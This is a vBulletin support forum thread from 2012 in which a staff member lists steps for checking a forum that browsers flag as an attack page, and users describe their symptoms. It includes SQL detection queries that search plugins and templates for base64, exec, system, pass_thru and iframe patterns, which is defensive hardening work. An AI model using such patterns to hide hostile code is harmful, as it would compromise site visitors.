Warning: Something's Not Right Here!

**Wayne Luke** · Thu 5 Jan '12, 2:55pm

1) Run Suspect File Diagnostics under Maintenance -> Diagnostics. Replace any files not containing the expected contents. Delete any files that are not part of vBulletin and that you can't identify as belonging to your addons.

2) Check the config.php for any suspicious code. It isn't checked by the suspect file diagnostic.

3) Search all templates for iframe tags. They should only appear in the following templates: bbcode_video, editor-ie.css, member.css, stylegenerator.css, vbcms.css, vbulletin.css, help_bbcodes, humanverify_recaptcha, search_common, and search_common_select_type

4) Check all your plugins for rogue include, require, include_once, or require_once code. All files should come from your server and be known to you.

5) Check your plugins for any base64 code. I recommend using against using any plugins or products that include base64 code in them. However some "lite" or branded addons will include this as a means to prevent you from cheating the author. You'll have to make a personal call on these if you use them. This is often a sign of a hacked site.

6) Make sure that your plugins do not include calls to exec(), system(), or pass_thru() or iframes. These are also often signs of a hacked site.

Query for step 4 and 5 -
SELECT title, phpcode, hookname, product FROM plugin WHERE phpcode LIKE '%base64%' OR phpcode LIKE '%exec%' OR phpcode LIKE '%system%' OR phpcode like '%pass_thru%' OR phpcode like '%iframe%';

7) Run this query: SELECT styleid, title, template FROM template WHERE template LIKE '%base64%' OR template LIKE '%exec%' OR template LIKE '%system%' OR template like '%pass_thru%' OR template like '%iframe%';

It checks the templates for compromising code.

8) Check .htaccess to make sure there are no redirects there.

**mmavipc** · Thu 5 Jan '12, 3:29pm

The exact same thing happened to my forum today.
None of the above steps revealed anything, it's not the yui connection js either.

**punchbowl** · Thu 5 Jan '12, 4:15pm

Originally posted by mmavipc

The exact same thing happened to my forum today.
None of the above steps revealed anything, it's not the yui connection js either.

if you get a warning on a specific page then search the page source for the domain name mentioned. chances are it's just a hotlinked image. Well that's what it's always been for my site.

**mmavipc** · Thu 5 Jan '12, 5:37pm

Nope, happens on all pages

**LA-Aquarium** · Thu 5 Jan '12, 8:26pm

Yeah, it happens on all pages. when I click on forum, threads or PM. can I give access to a support staff member to help me? I don't have much experience with this.

**TheNewOne** · Thu 5 Jan '12, 8:36pm

link to your site will see if it comes up for me

**mmavipc** · Thu 5 Jan '12, 10:05pm

It comes up for everyone.

**mmavipc** · Thu 5 Jan '12, 11:04pm

This seems to be the same issue as https://www.vbulletin.com/forum/showthread.php/392637-Kokosina-in-Anyone-Else-Getting-This

**Wayne Luke** · Fri 6 Jan '12, 8:20am

Well the "Attack Page" warning that is shown at the in the first post comes from the Browser, not the webpage. It means the site has been reported as a attack page, not that it actually is an attack page or that it is compromised. Ask you Hosting Provider for a different IP address for your site. Does that clear up the issue?

Following the steps previously provided, I can't think of any way that someone could cause your site to be an exploit unless you're running software other than vBulletin, your DNS is compromised or the IP address is listed as the origins of an Attack Site. I receive no such warning when visiting LA-Aquarium's site though.

The other customer doesn't have accurate information on his customer account so his site cannot be looked at.

**TheNewOne** · Fri 6 Jan '12, 9:23am

Originally posted by mmavipc

It comes up for everyone.

hard to say that as it does not come up for me as you still have not posted a link to your site

**LA-Aquarium** · Fri 6 Jan '12, 12:40pm

my website is www.laaquarium.com the message comes up once you enter or start browsing the forums.

So far today it has not came up. but it does this. It will go away for a day or two, then all of a sudden boom.. its ugly and has ruined my forum..

**Wayne Luke** · Fri 6 Jan '12, 12:44pm

Originally posted by LA-Aquarium

my website is www.laaquarium.com the message comes up once you enter or start browsing the forums.

I don't get a warning in either Chrome or Firefox.

**beishe8** · Fri 6 Jan '12, 12:47pm

Originally posted by LA-Aquarium

my website is www.laaquarium.com the message comes up once you enter or start browsing the forums.

So far today it has not came up. but it does this. It will go away for a day or two, then all of a sudden boom.. its ugly and has ruined my forum..

It is there as soon as I enter the forum.(Internet Explorer)

Is your Photo Gallery safe?

**LA-Aquarium** · Fri 6 Jan '12, 12:50pm

Originally posted by beishe8

It is there as soon as I enter the forum.(Internet Explorer)

Is your Photo Gallery safe?

I would assume so, I don't see anything wrong with it. why do you ask?

vBulletin 4 End of Life

Warning: Something's Not Right Here!

[Forum] Warning: Something's Not Right Here!

Comment

Comment

Comment

Comment

Comment

Comment

Comment

Comment

Comment

Comment

Comment

Comment

Comment

Comment